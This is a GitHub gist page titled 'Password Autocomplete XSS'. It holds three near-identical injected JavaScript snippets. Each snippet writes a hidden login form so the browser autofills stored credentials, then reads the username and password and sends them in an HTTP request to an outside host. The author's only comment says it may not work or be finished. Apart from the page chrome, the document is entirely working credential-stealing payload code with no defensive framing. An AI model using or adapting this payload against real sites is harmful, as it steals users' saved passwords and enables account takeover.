Created
December 22, 2011 22:34
-
-
Save btoews/1512149 to your computer and use it in GitHub Desktop.
Password Autocomplete XSS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
function attack() | |
{ | |
var username = document.forms['foo']['username'].value; | |
var password = document.forms['foo']['password'].value; | |
document.forms['foo']['password'].onchange=""; | |
document.forms['foo'].style.visibility = 'hidden'; | |
var request; | |
if (window.XMLHttpRequest) | |
{ | |
request=new XMLHttpRequest(); | |
} | |
else | |
{ | |
request=new ActiveXObject("Microsoft.XMLHTTP"); | |
} | |
var url = "http://btoe.ws/blah.php?username="+username+"&password="+password; | |
request.open("GET",url,true); | |
request.send(); | |
} | |
document.write(" | |
<form name='foo'> | |
Username:<input type='text' name='username'> | |
<br> | |
Password:<input type='password' name='password' onchange='attack()'> | |
<br> | |
<input type='submit' name='submit' value='Log Inn'> | |
</form> | |
"); | |
</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
function attack() | |
{ | |
var username = document.forms['foo']['username'].value; | |
var password = document.forms['foo']['password'].value; | |
document.forms['foo']['password'].onchange=""; | |
document.forms['foo'].style.visibility = 'hidden'; | |
var request; | |
if (window.XMLHttpRequest) | |
{ | |
request=new XMLHttpRequest(); | |
} | |
else | |
{ | |
request=new ActiveXObject("Microsoft.XMLHTTP"); | |
} | |
var url = "http://btoe.ws/blah.php?username="+username+"&password="+password; | |
request.open("GET",url,true); | |
request.send(); | |
} | |
function holdon() | |
{ | |
if(document.forms['foo']['password'].value.length < 1) | |
{ | |
var t = setTimeout("holdon()",5); | |
} | |
else | |
{ | |
attack(); | |
} | |
} | |
document.write(" | |
<form name='foo'> | |
Username:<input type='text' name='username'> | |
<br> | |
Password:<input type='password' name='password'> | |
<br> | |
<input type='submit' name='submit' value='Log Inn'> | |
</form> | |
"); | |
holdon() | |
</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
function attack() | |
{ | |
var username = document.forms['foo']['username'].value; | |
var password = document.forms['foo']['password'].value; | |
document.forms['foo']['password'].onchange=""; | |
document.forms['foo'].style.visibility = 'hidden'; | |
var request; | |
if (window.XMLHttpRequest) | |
{ | |
request=new XMLHttpRequest(); | |
} | |
else | |
{ | |
request=new ActiveXObject("Microsoft.XMLHTTP"); | |
} | |
var url = "http://btoe.ws/blah.php?username="+username+"&password="+password; | |
request.open("GET",url,true); | |
request.send(); | |
} | |
document.write(" | |
<form name='foo'> | |
Username:<input type='text' name='username'> | |
<br> | |
Password:<input type='password' name='password' onchange='attack()'> | |
<br> | |
<input type='submit' name='submit' value='Log Inn'> | |
</form> | |
"); | |
</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I'm not sure if this works. I might not have finished it.